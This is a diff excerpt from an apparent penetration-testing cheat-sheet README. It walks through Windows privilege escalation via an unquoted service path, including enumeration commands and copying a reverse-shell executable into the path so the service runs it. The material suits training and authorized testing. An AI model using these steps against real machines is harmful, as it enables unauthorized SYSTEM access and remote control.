seeu-inspace/easyg/README.md

 2. Query a service.
 If it runs with `SYSTEM` privileges (check `SERVICE_START_NAME`) and the `BINARY_PATH_NAME` value is unquoted and contains spaces, it's possible a privilege escalation
    - `sc qc <service>`
    - Example: `BINARY_PATH_NAME: C:\Program Files\Unquoted Path Service\Common Results\unquotedpathservice.exe`
+   - You can also use the Powershell command `wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """`
 3. Use AccessChk to check write permissions in this directory `C:\PrivEsc\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service\"`
+   - You can review the permissions with `icacls "C:\"` and `icacls "C:\Program Files\Enterprise Apps"`
+   - Check if you can run and stop the service with `Start-Service GammaService` and `Stop-Service`
 4. Copy the reverse shell `copy C:\PrivEsc\reverse.exe "C:\Program Files\Unquoted Path Service\Common.exe"`
 5. Start a listener on the attacker machine and run the service